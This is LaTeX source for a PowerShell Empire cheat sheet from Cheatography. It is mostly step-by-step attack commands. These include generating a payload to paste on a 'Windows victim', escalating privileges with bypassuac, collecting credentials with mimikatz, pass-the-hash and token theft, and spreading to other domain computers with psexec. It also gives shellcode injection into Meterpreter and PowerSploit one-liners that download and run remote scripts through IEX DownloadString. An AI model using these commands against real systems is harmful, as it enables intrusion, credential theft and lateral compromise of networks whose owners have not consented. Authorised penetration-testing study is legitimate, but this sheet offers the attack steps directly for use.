\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{fred} \pdfinfo{ /Title (powershell-empire.pdf) /Creator (Cheatography) /Author (fred) /Subject (Powershell Empire Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{0515A3} \definecolor{LightBackground}{HTML}{F7F7FC} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Powershell Empire Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{fred} via \textcolor{DarkBackground}{\uline{cheatography.com/22666/cs/9078/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}fred \\ \uline{cheatography.com/fred} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Published 12th September, 2016.\\ Updated 12th September, 2016.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{4} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Resources}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{Official Site - \seqsplit{http://www.powershellempire.com} \newline % Row Count 1 (+ 1) Indepth Tutorial + Word Excel Macro Example -  \newline % Row Count 2 (+ 1) \seqsplit{https://www.youtube.com/watch?v=aDeJBe6eqps} \newline % Row Count 3 (+ 1) \textasciitilde{}39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Adversarial Tradecraft \newline % Row Count 5 (+ 2) \seqsplit{https://www.youtube.com/watch?v=xHkRhRo3l8o} \newline % Row Count 6 (+ 1) Offensive Active Directory with Powershell \newline % Row Count 7 (+ 1) \seqsplit{https://www.youtube.com/watch?v=cXWtu-qalSs}% Row Count 8 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Installation}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{`git clone \seqsplit{https://github.com/powershellempire/empire} ` \newline % Row Count 2 (+ 2) `sudo apt-get install python-pip python-openssl` \newline % Row Count 3 (+ 1) `cd empire` \newline % Row Count 4 (+ 1) `cd setup ` \newline % Row Count 5 (+ 1) `sudo ./install.sh`% Row Count 6 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Execution \& Exploitation}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{{\bf{Create listener and generate Base64 cmd payload}} \newline % Row Count 2 (+ 2) `sudo ./empire` \newline % Row Count 3 (+ 1) `listeners` \newline % Row Count 4 (+ 1) `set Name listenername` \newline % Row Count 5 (+ 1) `execute` \newline % Row Count 6 (+ 1) `usestager launcher listenername` \newline % Row Count 7 (+ 1) `execute` (generate payload, copy \& paste into cmd on Windows victim) \newline % Row Count 9 (+ 2) `agents` \newline % Row Count 10 (+ 1) {\bf{Note:}} Type in `usestager` then hit TAB twice for more options.% Row Count 12 (+ 2) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Post Exploitation}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{`agents` \newline % Row Count 1 (+ 1) `interact AGENTNAME` \newline % Row Count 2 (+ 1) `sysinfo` \newline % Row Count 3 (+ 1) `usemodule \seqsplit{situational\_awareness/network/arpscan`} \newline % Row Count 4 (+ 1) `set Range 10.0.0.0-10.0.0.255` \newline % Row Count 5 (+ 1) `execute` \newline % Row Count 6 (+ 1) ... \newline % Row Count 7 (+ 1) `usemodule \seqsplit{situational\_awareness/network/reverse\_dns`} \newline % Row Count 9 (+ 2) `set Range 10.0.0.0-10.0.0.255` \newline % Row Count 10 (+ 1) `execute` \newline % Row Count 11 (+ 1) ... \newline % Row Count 12 (+ 1) `usemodule \seqsplit{situational\_awareness/network/powerview/user\_hunter`} \newline % Row Count 14 (+ 2) `execute` \newline % Row Count 15 (+ 1) ... \newline % Row Count 16 (+ 1) `usemodule \seqsplit{situational\_awareness/network/powerview/share\_finder`} \newline % Row Count 18 (+ 2) `set CheckShareAccess True` \newline % Row Count 19 (+ 1) `execute` \newline % Row Count 20 (+ 1) ... \newline % Row Count 21 (+ 1) `agents` \newline % Row Count 22 (+ 1) `interact AGENTNAME` \newline % Row Count 23 (+ 1) `bypassuac LISTENERNAME` \newline % Row Count 24 (+ 1) `y` \newline % Row Count 25 (+ 1) ...wait for agent now active to appear... \newline % Row Count 26 (+ 1) `agents` (look for a user with * as this indicates admin) \newline % Row Count 28 (+ 2) `interact AGENTNAME` \newline % Row Count 29 (+ 1) `mimikatz` (collect creds, etc...) \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Post Exploitation (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{`creds` \newline % Row Count 1 (+ 1) `dir \textbackslash{}\textbackslash{}COMPUTERNAME\textbackslash{}C\$` \newline % Row Count 2 (+ 1) `creds` \newline % Row Count 3 (+ 1) `pth 1` (passthehash using cred 1, a PID will be created) \newline % Row Count 5 (+ 2) `steal\_token PIDNUM` \newline % Row Count 6 (+ 1) `dir \textbackslash{}\textbackslash{}COMPUTERNAME\textbackslash{}C\$`% Row Count 7 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Lateral Movement}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{`usemodule \seqsplit{situational\_awareness/network/powerview/find\_localadmin\_access`} \newline % Row Count 2 (+ 2) `info` \newline % Row Count 3 (+ 1) `execute` (computer-names vulnerable to psexec will appear) \newline % Row Count 5 (+ 2) `usemodule \seqsplit{lateral\_movement/invoke\_psexec`} \newline % Row Count 6 (+ 1) `info` \newline % Row Count 7 (+ 1) `set Listener test1` \newline % Row Count 8 (+ 1) `set ComputerName WIN10COMP.blah.com` (machine to attack) \newline % Row Count 10 (+ 2) `info` \newline % Row Count 11 (+ 1) `execute` \newline % Row Count 12 (+ 1) You can repeat the above process to infect other computers on the domain.% Row Count 14 (+ 2) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Connect to a Meterpreter Multi-Handler}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{Start your meterpreter multi handler, then do the following: \newline % Row Count 2 (+ 2) `interact NAME` (target name from the 'agents' menu) \newline % Row Count 4 (+ 2) `usemodule \seqsplit{code\_execution/invoke\_shellcode`} \newline % Row Count 5 (+ 1) `info` \newline % Row Count 6 (+ 1) `set lhost IPADDRESS` (the IP in your multi-handler session) \newline % Row Count 8 (+ 2) `set lport PORT` (the port in your multi-handler session) \newline % Row Count 10 (+ 2) `execute` (wait...) \newline % Row Count 11 (+ 1) (a meterpreter session will appear in metasploit)% Row Count 12 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Powersploit}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{Source - \seqsplit{https://github.com/PowerShellMafia/PowerSploit/} \newline % Row Count 2 (+ 2) {\bf{Demos}} \newline % Row Count 3 (+ 1) User Hunting - \seqsplit{https://www.sixdub.net/?p=591} \newline % Row Count 4 (+ 1) Reverse meterpreter shell - DLL Injection using PowerSploit and Metasploit \newline % Row Count 6 (+ 2) \seqsplit{https://www.youtube.com/watch?v=yKoD5Oy8CKQ} \newline % Row Count 7 (+ 1) PowerShell Toolkit: PowerSploit - Gaining Shells Without Writing To Disk \newline % Row Count 9 (+ 2) \seqsplit{https://www.youtube.com/watch?v=LEll6qa-REY}% Row Count 10 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Powersploit Example}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{`cmd` \newline % Row Count 1 (+ 1) `powershell` \newline % Row Count 2 (+ 1) `IEX (New-Object \seqsplit{Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/raw/master/CodeExecution/Invoke-Shellcode.ps1")`}% Row Count 5 (+ 3) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{3.833cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Powersploit Priv Esc}} \tn \SetRowColor{white} \mymulticolumn{1}{x{3.833cm}}{`cmd` \newline % Row Count 1 (+ 1) `powershell` \newline % Row Count 2 (+ 1) `IEX (New-Object \seqsplit{Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")`} \newline % Row Count 5 (+ 3) `IEX (New-Object \seqsplit{Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Privesc.psd1")`} \newline % Row Count 8 (+ 3) `Invoke-AllChecks`% Row Count 9 (+ 1) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}